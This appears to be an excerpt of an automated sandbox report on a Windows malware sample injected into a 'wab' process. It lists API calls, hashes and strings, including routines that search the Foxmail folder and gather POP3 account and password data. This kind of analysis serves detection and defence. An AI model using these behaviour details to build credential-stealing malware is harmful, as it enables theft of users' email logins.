IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 
7172->7173 7174 22b22744 ___scrt_fastfail 7173->7174 7174->7143 7176 22b234d7 7175->7176 7176->7161 7182 22b253ff 7177->7182 7189 22b25c2b 7182->7189 7185 22b2391b 7186 22b2354d 7185->7186 7187 22b23925 7185->7187 7186->7164 7200 22b23b2c 7187->7200 7190 22b25c35 7189->7190 7192 22b22476 7189->7192 7193 22b25db2 7190->7193 7192->7185 7194 22b25c45 __dosmaperr 5 API calls 7193->7194 7195 22b25dd9 7194->7195 7196 22b25df1 TlsFree 7195->7196 7197 22b25de5 7195->7197 7196->7197 7198 22b22ada _ValidateLocalCookies 5 API calls 7197->7198 7199 22b25e02 7198->7199 7199->7192 7201 22b23a82 try_get_function 5 API calls 7200->7201 7202 22b23b46 7201->7202 7203 22b23b5e TlsFree 7202->7203 7204 22b23b52 7202->7204 7203->7204 7204->7186 7216 22b274da 7205->7216 7208 22b23529 7209 22b23532 7208->7209 7210 22b23543 7208->7210 7211 22b2391b ___vcrt_uninitialize_ptd 6 API calls 7209->7211 7210->7170 7212 22b23537 7211->7212 7220 22b23972 7212->7220 7217 22b274f3 7216->7217 7218 22b22ada _ValidateLocalCookies 5 API calls 7217->7218 7219 22b22625 7218->7219 7219->7208 7221 22b2353c 7220->7221 7222 22b2397d 7220->7222 7224 22b23c50 7221->7224 7223 22b23987 RtlDeleteCriticalSection 7222->7223 7223->7221 7223->7223 7225 22b23c7f 7224->7225 7226 22b23c59 7224->7226 7225->7210 7226->7225 7227 22b23c69 FreeLibrary 7226->7227 7227->7226 7228 22b2724e GetProcessHeap 7229 22b2284f 7230 22b22882 std::exception::exception 27 API calls 7229->7230 7231 22b2285d 7230->7231 7019 22b2220c 7020 22b22215 7019->7020 7021 22b2221a dllmain_dispatch 7019->7021 7023 22b222b1 7020->7023 7024 22b222c7 7023->7024 7026 22b222d0 7024->7026 7027 22b22264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7024->7027 7026->7021 7027->7026

                                          Control-flow Graph

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22B21137
                                          • lstrcatW.KERNEL32(?,?), ref: 22B21151
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2115C
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2116D
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2117C
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22B21193
                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 22B211D0
                                          • FindClose.KERNEL32(00000000), ref: 22B211DB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                          • String ID:
                                          • API String ID: 1083526818-0
                                          • Opcode ID: c440ce8b5ee44626e15523960ec62d9f868a0d6bba878176006a6699db343d99
                                          • Instruction ID: 5aeceb23db4fd6fbd8d46c460a51131a4f1402d25e72ff771aecf208b0d89713
                                          • Opcode Fuzzy Hash: c440ce8b5ee44626e15523960ec62d9f868a0d6bba878176006a6699db343d99
                                          • Instruction Fuzzy Hash: DB2106719443096BC710EBA49C48F8B7BDCEF84315F000E2AFA58D30A0E774D244C796

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNEL32(00000005), ref: 04586E87
                                          • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 04586EEE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, Offset: 03BCD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3bcd000_wab.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryProtectSleepVirtual
                                          • String ID:
                                          • API String ID: 3235210055-0
                                          • Opcode ID: 6f33c8518c956537a747774fd4ed3a71e5b7b2fd7c6f9fd96884927f089bfad1
                                          • Instruction ID: 624b1d28a85eb53cf2ccd623821ed340cd50b568839add0350d88364a61a3421
                                          • Opcode Fuzzy Hash: 6f33c8518c956537a747774fd4ed3a71e5b7b2fd7c6f9fd96884927f089bfad1
                                          • Instruction Fuzzy Hash: 151159716107019FEB04BE34C88C78BB3A5BF103B4F978149AC61AB4E6DB64D4C18F12

                                          Control-flow Graph

                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22B21434
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22B21137
                                            • Part of subcall function 22B210F1: lstrcatW.KERNEL32(?,?), ref: 22B21151
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2115C
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2116D
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2117C
                                            • Part of subcall function 22B210F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22B21193
                                            • Part of subcall function 22B210F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 22B211D0
                                            • Part of subcall function 22B210F1: FindClose.KERNEL32(00000000), ref: 22B211DB
                                          • lstrlenW.KERNEL32(?), ref: 22B214C5
                                          • lstrlenW.KERNEL32(?), ref: 22B214E0
                                          • lstrlenW.KERNEL32(?,?), ref: 22B2150F
                                          • lstrcatW.KERNEL32(00000000), ref: 22B21521
                                          • lstrlenW.KERNEL32(?,?), ref: 22B21547
                                          • lstrcatW.KERNEL32(00000000), ref: 22B21553
                                          • lstrlenW.KERNEL32(?,?), ref: 22B21579
                                          • lstrcatW.KERNEL32(00000000), ref: 22B21585
                                          • lstrlenW.KERNEL32(?,?), ref: 22B215AB
                                          • lstrcatW.KERNEL32(00000000), ref: 22B215B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                          • String ID: )$Foxmail$ProgramFiles
                                          • API String ID: 672098462-2938083778
                                          • Opcode ID: 32e58d49e287b1af7f3e6e99b55641d3ffb27736d9947c0ab93f3f4046bb7a8f
                                          • Instruction ID: cb24d072916c2e7467ed5b9c6964e131f8f632641d83146486098ee029066dcf
                                          • Opcode Fuzzy Hash: 32e58d49e287b1af7f3e6e99b55641d3ffb27736d9947c0ab93f3f4046bb7a8f
                                          • Instruction Fuzzy Hash: 6C818371A5035CAAEB20DBA4DC85FEF737DEF84710F000696F508E71A1EAB15A84CB95

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B259EA
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B259F6
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A01
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A0C
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A17
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A22
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A2D
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A38
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A43
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A51
                                          • _free.LIBCMT ref: 22B259CB
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: a10c4fce587a2011ee79e41ef0986008735e113b389719567842526d62b07321
                                          • Instruction ID: e89826da0f63e2675f237256cb68d8b3e0bce51f3c72ca369124b4d76983177d
                                          • Opcode Fuzzy Hash: a10c4fce587a2011ee79e41ef0986008735e113b389719567842526d62b07321
                                          • Instruction Fuzzy Hash: B4C01272009B08AADB19AE00D911A593F95DB503A4F60C126BA0C154709A7299A1D6C8
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 22B261DA
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 22B261E4
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 22B261F1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 71b0ecdb45a638d2e6d5a20179d535c21276c9641b0988143e57cd94f5b068b5
                                          • Instruction ID: 607614b319cd2a23e4ec0dc471ed754d69bf3e6ae903fc57278bb78c8e6317e9
                                          • Opcode Fuzzy Hash: 71b0ecdb45a638d2e6d5a20179d535c21276c9641b0988143e57cd94f5b068b5
                                          • Instruction Fuzzy Hash: B031A074D513289BCB21DF64D988B8DBBB8AF18310F5042EAE81CA7260E7749F858F45
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000,?,22B22082,22B32108,0000000C,22B21F3A,?), ref: 22B24AD5
                                          • TerminateProcess.KERNEL32(00000000,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000,?,22B22082,22B32108,0000000C,22B21F3A,?), ref: 22B24ADC
                                          • ExitProcess.KERNEL32 ref: 22B24AEE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: b779bedf304760bfdd1ff288de2b8dfc205a3459347b092403e897759472cc56
                                          • Instruction ID: a173c99786dd979dc2e3af956359d40dd134ab3ce378c63a74aac108114b2310
                                          • Opcode Fuzzy Hash: b779bedf304760bfdd1ff288de2b8dfc205a3459347b092403e897759472cc56
                                          • Instruction Fuzzy Hash: 65E01A35000B05AFCB01AF64CA18A4A3B29EF09381F014610FE184B435CB39D943DA84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: 6868fa95c848adecd328bd500c4930a7d14707d9aa0a5a35f8b9eae0f690953d
                                          • Instruction ID: 30a8c47e318b90089f0ee844e32a72ee4c7fc30af757e698377dc89d7585db03
                                          • Opcode Fuzzy Hash: 6868fa95c848adecd328bd500c4930a7d14707d9aa0a5a35f8b9eae0f690953d
                                          • Instruction Fuzzy Hash: 61310271900709AFCB15CE78CD84EEA7BBDDB85304F0003A9E91CD7266E6319E458B60
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: 7921c3834c1e837f4b23a7f8a38c5fcb3759f6f5209085152f0afb334c36413b
                                          • Instruction ID: dc2b1f8673eb01052203b40d2adb2e30a58c8a3a1cf80794e7af806655117118
                                          • Opcode Fuzzy Hash: 7921c3834c1e837f4b23a7f8a38c5fcb3759f6f5209085152f0afb334c36413b
                                          • Instruction Fuzzy Hash: 41A011302802038F83008F30822A20E3AACBE802C0B020A2AAC08CA028EB2C80008A00

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 22B21CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D1B
                                            • Part of subcall function 22B21CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22B21D37
                                            • Part of subcall function 22B21CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D4B
                                          • _strlen.LIBCMT ref: 22B21855
                                          • _strlen.LIBCMT ref: 22B21869
                                          • _strlen.LIBCMT ref: 22B2188B
                                          • _strlen.LIBCMT ref: 22B218AE
                                          • _strlen.LIBCMT ref: 22B218C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _strlen$File$CopyCreateDelete
                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                          • API String ID: 3296212668-3023110444
                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction ID: e273ff3826e26e77cdd161ef8201e18f398c338f20d8d2ee3c8aabdd158ba9f3
                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction Fuzzy Hash: EA61E471D10B18ABEF11CBA4CC40BDEB7B9AF19304F104656D20CBB266DB745A46CF52

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: %m$~$Gon~$~F@7$~dra
                                          • API String ID: 4218353326-230879103
                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction ID: c8189e6362229575fd43b0d6c3fd16d2129c450994aecfd7b6407ca6787cb39f
                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction Fuzzy Hash: D071F3B1D10B286BDF11DBA48C84BDF7BFCAB19300F144196D658E7252EA749785CBA0

                                          Control-flow Graph

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 22B27D06
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B290D7
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B290E9
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B290FB
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2910D
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2911F
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29131
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29143
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29155
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29167
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29179
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2918B
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2919D
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B291AF
                                          • _free.LIBCMT ref: 22B27CFB
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B27D1D
                                          • _free.LIBCMT ref: 22B27D32
                                          • _free.LIBCMT ref: 22B27D3D
                                          • _free.LIBCMT ref: 22B27D5F
                                          • _free.LIBCMT ref: 22B27D72
                                          • _free.LIBCMT ref: 22B27D80
                                          • _free.LIBCMT ref: 22B27D8B
                                          • _free.LIBCMT ref: 22B27DC3
                                          • _free.LIBCMT ref: 22B27DCA
                                          • _free.LIBCMT ref: 22B27DE7
                                          • _free.LIBCMT ref: 22B27DFF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 8dddc3e6391f428d72e0a8f3ee60a97645ee6995a5218f86163c9789223de28e
                                          • Instruction ID: 20180880b8a8586c840142851150907877d691b85cb028a17b161709e899e264
                                          • Opcode Fuzzy Hash: 8dddc3e6391f428d72e0a8f3ee60a97645ee6995a5218f86163c9789223de28e
                                          • Instruction Fuzzy Hash: F5315E71600B04EFDB25DE39DA40BA677E9EF04394F208659E84CD75B1DF71A980DB14

                                          Control-flow Graph

                                          APIs
                                          • _free.LIBCMT ref: 22B259EA
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B259F6
                                          • _free.LIBCMT ref: 22B25A01
                                          • _free.LIBCMT ref: 22B25A0C
                                          • _free.LIBCMT ref: 22B25A17
                                          • _free.LIBCMT ref: 22B25A22
                                          • _free.LIBCMT ref: 22B25A2D
                                          • _free.LIBCMT ref: 22B25A38
                                          • _free.LIBCMT ref: 22B25A43
                                          • _free.LIBCMT ref: 22B25A51
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                           • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 9ab104301a44f129b8b3b4b8b52c21de1ab49f17a0dcd589093740ffc2c11611
                                          • Instruction ID: 959fe1ff79d6c7ac9c6ecc4dc35821a5f416eed3252e02fb13e0bb476f86fa1d
                                          • Opcode Fuzzy Hash: 9ab104301a44f129b8b3b4b8b52c21de1ab49f17a0dcd589093740ffc2c11611
                                          • Instruction Fuzzy Hash: 3411A47A560748EFCB29DF94C851CDD3FA5EF18350B1582A1BA0C8F231DA71EA509B80

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 312 22b2aa53-22b2aa6e 313 22b2aa80 312->313 314 22b2aa70-22b2aa7e RtlDecodePointer 312->314 315 22b2aa85-22b2aa8b 313->315 314->315 316 22b2abb2-22b2abb5 315->316 317 22b2aa91 315->317 320 22b2ac12 316->320 321 22b2abb7-22b2abba 316->321 318 22b2aba6 317->318 319 22b2aa97-22b2aa9a 317->319 322 22b2aba8-22b2abad 318->322 323 22b2aaa0 319->323 324 22b2ab47-22b2ab4a 319->324 325 22b2ac19 320->325 326 22b2ac06 321->326 327 22b2abbc-22b2abbf 321->327 328 22b2ac5b-22b2ac6a call 22b22ada 322->328 329 22b2aaa6-22b2aaab 323->329 330 22b2ab34-22b2ab42 323->330 334 22b2ab4c-22b2ab4f 324->334 335 22b2ab9d-22b2aba4 324->335 331 22b2ac20-22b2ac49 325->331 326->320 332 22b2abc1-22b2abc4 327->332 333 22b2abfa 327->333 338 22b2ab25-22b2ab2f 329->338 339 22b2aaad-22b2aab0 329->339 330->331 359 22b2ac56-22b2ac59 331->359 360 22b2ac4b-22b2ac50 call 22b26368 331->360 340 22b2abc6-22b2abc9 332->340 341 22b2abee 332->341 333->326 342 22b2ab51-22b2ab54 334->342 343 22b2ab94-22b2ab9b 334->343 337 22b2ab61-22b2ab8f 335->337 337->359 338->331 346 22b2aab2-22b2aab5 339->346 347 22b2ab1c-22b2ab23 339->347 349 22b2abe2 340->349 350 22b2abcb-22b2abd0 340->350 341->333 342->328 344 22b2ab5a 342->344 343->325 344->337 355 22b2aab7-22b2aaba 346->355 356 22b2ab0d-22b2ab17 346->356 354 22b2aac7-22b2aaf7 347->354 349->341 351 22b2abd2-22b2abd5 350->351 352 22b2abdb-22b2abe0 350->352 351->328 351->352 352->322 354->359 366 22b2aafd-22b2ab08 call 22b26368 354->366 355->328 357 22b2aac0 355->357 356->331 357->354 359->328 360->359 366->359
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                          • API String ID: 3527080286-3064271455
                                          • Opcode ID: f77b7eba20fbf40a0a5ad6d9627eda4a36262960787b682b975e457d173e06b2
                                          • Instruction ID: 334e4cd729dae163e2ba5c20b01f77401fb005725525d738462c62254e0e208d
                                          • Opcode Fuzzy Hash: f77b7eba20fbf40a0a5ad6d9627eda4a36262960787b682b975e457d173e06b2
                                          • Instruction Fuzzy Hash: 38514C70900F4ACBEB01DFA4DA885DCBBB5FF4B254F104785E998B7664CB398A64CB14

                                          Control-flow Graph

                                          APIs
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D1B
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22B21D37
                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D4B
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D58
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D72
                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D7D
                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D8A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 1454806937-0
                                          • Opcode ID: bfb7f6277d97c55fa906446c0355fb1830b9debe3e9faaf6716cbe98e3b9c37a
                                          • Instruction ID: d08fddc93eb366c47375ac8575456c978fe82cf92614a766b5c546a3080bf30b
                                          • Opcode Fuzzy Hash: bfb7f6277d97c55fa906446c0355fb1830b9debe3e9faaf6716cbe98e3b9c37a
                                          • Instruction Fuzzy Hash: AF212AB194131DBFEB11DBA08C8CEEB76ACEF18394F010AA6F915D3154D6749E468A70

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 386 22b29492-22b294ef GetConsoleCP 387 22b29632-22b29644 call 22b22ada 386->387 388 22b294f5-22b29511 386->388 389 22b29513-22b2952a 388->389 390 22b2952c-22b2953d call 22b27c19 388->390 392 22b29566-22b29575 call 22b279e6 389->392 397 22b29563-22b29565 390->397 398 22b2953f-22b29542 390->398 392->387 402 22b2957b-22b2959b WideCharToMultiByte 392->402 397->392 400 22b29548-22b2955a call 22b279e6 398->400 401 22b29609-22b29628 398->401 400->387 409 22b29560-22b29561 400->409 401->387 402->387 403 22b295a1-22b295b7 WriteFile 402->403 405 22b2962a-22b29630 GetLastError 403->405 406 22b295b9-22b295ca 403->406 405->387 406->387 408 22b295cc-22b295d0 406->408 410 22b295d2-22b295f0 WriteFile 408->410 411 22b295fe-22b29601 408->411 409->402 410->405 412 22b295f2-22b295f6 410->412 411->388 413 22b29607 411->413 412->387 414 22b295f8-22b295fb 412->414 413->387 414->411
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22B29C07,?,00000000,?,00000000,00000000), ref: 22B294D4
                                          • __fassign.LIBCMT ref: 22B2954F
                                          • __fassign.LIBCMT ref: 22B2956A
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22B29590
                                          • WriteFile.KERNEL32(?,?,00000000,22B29C07,00000000,?,?,?,?,?,?,?,?,?,22B29C07,?), ref: 22B295AF
                                          • WriteFile.KERNEL32(?,?,?,22B29C07,00000000,?,?,?,?,?,?,?,?,?,22B29C07,?), ref: 22B295E8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmp
